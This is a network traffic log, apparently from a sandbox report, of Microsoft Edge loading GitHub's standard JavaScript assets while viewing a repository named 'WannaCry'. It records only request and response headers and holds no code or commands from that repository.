185.199.111.154:443

Request

GET /assets/sessions-b83865e93139.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:26:11 GMT
etag: "0x8DCEDEE7BB08BEC"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 17712
x-served-by: cache-iad-kiad7000096-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 18, 98
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4acbbb6f0b15b9ee45cd77c6ee2c927992342359
content-length: 14728
GET

https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_query_js-node_modules_tanstack_react-qu-e4a133-25f9fad0b763.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_tanstack_query-core_build_modern_query_js-node_modules_tanstack_react-qu-e4a133-25f9fad0b763.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE312790353D7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1236217
x-served-by: cache-iad-kiad7000037-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 37792
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6a6c8598953062a8c3386cd55f1abd8f04bf98ff
content-length: 5011
GET

https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-7aa5ebad499a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-7aa5ebad499a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 24 Sep 2024 22:14:24 GMT
etag: "0x8DCDCE63FB566AE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1818328
x-served-by: cache-iad-kcgs7200063-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 140, 28556
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: eb0bc0ec3754196ad58b30d51247163f484b6bef
content-length: 4392
GET

https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-d56e55-4533ead6a048.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-d56e55-4533ead6a048.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:02 GMT
etag: "0x8DCE3127730EEAF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1236217
x-served-by: cache-iad-kiad7000161-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 43096
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6a55546966741818115583029b5ad3df351e0752
content-length: 90797
GET

https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-ce989b6c1293.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-ce989b6c1293.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 07 Oct 2024 20:02:10 GMT
etag: "0x8DCE70AED8CFDAF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 787636
x-served-by: cache-iad-kiad7000084-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 26069
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3f9b3ed5d562d6ab62656b3f501926f405ebd881
content-length: 5640
GET

https://github.githubassets.com/assets/ui_packages_paths_index_ts-dce6cc95a312.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_paths_index_ts-dce6cc95a312.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 15 Oct 2024 04:54:22 GMT
etag: "0x8DCECD56FDB65F1"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 60870
x-served-by: cache-iad-kcgs7200081-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 62, 2540
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b60f94a8f41cedbb1d73a48454e4900f488fc302
content-length: 6173
GET

https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-8345f53a5ea1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_ref-selector_RefSelector_tsx-8345f53a5ea1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 10 Oct 2024 23:50:06 GMT
etag: "0x8DCE986445110D7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 21618
x-served-by: cache-iad-kjyo7100156-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 16, 1133
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d6bf7318a63b735566b2751634b7e8f5664cc0bd
content-length: 5473
GET

https://github.githubassets.com/assets/ui_packages_verified-fetch_verified-fetch_ts-ui_packages_code-view-shared_components_SharedMa-058d4a-ede90624198e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_verified-fetch_verified-fetch_ts-ui_packages_code-view-shared_components_SharedMa-058d4a-ede90624198e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:26:11 GMT
etag: "0x8DCEDEE7BAFA265"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 17712
x-served-by: cache-iad-kiad7000141-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 84
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9d3544cdfb4ed0ae74cc9c847dd8e19706ca5f01
content-length: 10389
GET

https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-2170c0-9e46edbb5acf.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-2170c0-9e46edbb5acf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 14:36:08 GMT
etag: "0x8DCEEB90A5517D6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 17712
x-served-by: cache-iad-kiad7000060-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 85
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 06d79c5525de75a29f5630573061cb4c72d9c764
content-length: 17674
GET

https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-012d79-23be1e3cb034.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-012d79-23be1e3cb034.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 14 Oct 2024 18:39:59 GMT
etag: "0x8DCEC7F9BE0BC75"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 107756
x-served-by: cache-iad-kcgs7200022-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 13, 3370
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 31029d984e9cd3af90ddfeaaf6d639081605ac9e
content-length: 3056
GET

https://github.githubassets.com/assets/repos-overview-d08f97d0e1ca.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repos-overview-d08f97d0e1ca.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE31278FD8DF2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1236217
x-served-by: cache-iad-kcgs7200069-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 41056
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d0a2c161385e8a27cd445184458596ee14a209bc
content-length: 12363
GET

https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-90c1b002fec5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-app_components_primer_experimental_select-panel-element_ts-90c1b002fec5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 24 Sep 2024 07:23:05 GMT
etag: "0x8DCDC69BBBBD3ED"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 2031747
x-served-by: cache-iad-kjyo7100098-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 1, 57294
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4b154a7d3494015c178ef73cff39c976e17a093c
content-length: 7672
GET

https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-1077a1578034.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-1077a1578034.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 05 Aug 2024 19:46:34 GMT
etag: 0x8DCB58750224B38
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 4506320
x-served-by: cache-iad-kjyo7100141-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 19, 66261
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bab22769ac3b1d218bd36401a7d53d0241dc3b39
content-length: 543
GET

https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-a18fad-93afc0ffc78f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-a18fad-93afc0ffc78f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:15 GMT
etag: "0x8DCEDF096BC2781"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kjyo7100111-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 1491
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8cc62bff66a535f9593699cf0fefbdfdda54fc62
content-length: 6223
GET

https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-1546dc8c42cb.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_query-builder-element_query-builder-element_ts-1546dc8c42cb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 13 Sep 2024 14:50:54 GMT
etag: "0x8DCD40378515B21"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1948822
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 50642
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b9da5af52bc136ae2d939b14415d2e1acfb7a9fa
content-length: 7652
GET

https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-0101b49b9f00.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-0101b49b9f00.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 18:14:38 GMT
etag: "0x8DCE3D73E6620D1"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 804384
x-served-by: cache-iad-kjyo7100076-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 5, 24004
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c10abe251dc3ee50718d5e3aa906dbd5be70c389
content-length: 5387
GET

https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-ui_packages_trusted-types-policies_policy_ts--7cc11e-123cbdba07d7.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-app_components_search_qbsearch-input-element_ts-ui_packages_trusted-types-policies_policy_ts--7cc11e-123cbdba07d7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:15 GMT
etag: "0x8DCEDF096A31669"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kjyo7100102-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 1499
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: af3309005bb65a676046ec349d6c40b406c10d5c
content-length: 20398
GET

https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-23c1cb96287b.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-23c1cb96287b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 13:07:25 GMT
etag: "0x8DCEDE37AF59EA5"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 107757
x-served-by: cache-iad-kcgs7200076-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 2, 4730
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c2ddf9dc8fb718641f6dfdc778c8dab06274f073
content-length: 2941
GET

https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-2ab85b7d16d5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-2ab85b7d16d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 13:07:25 GMT
etag: "0x8DCEDE37AF61357"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
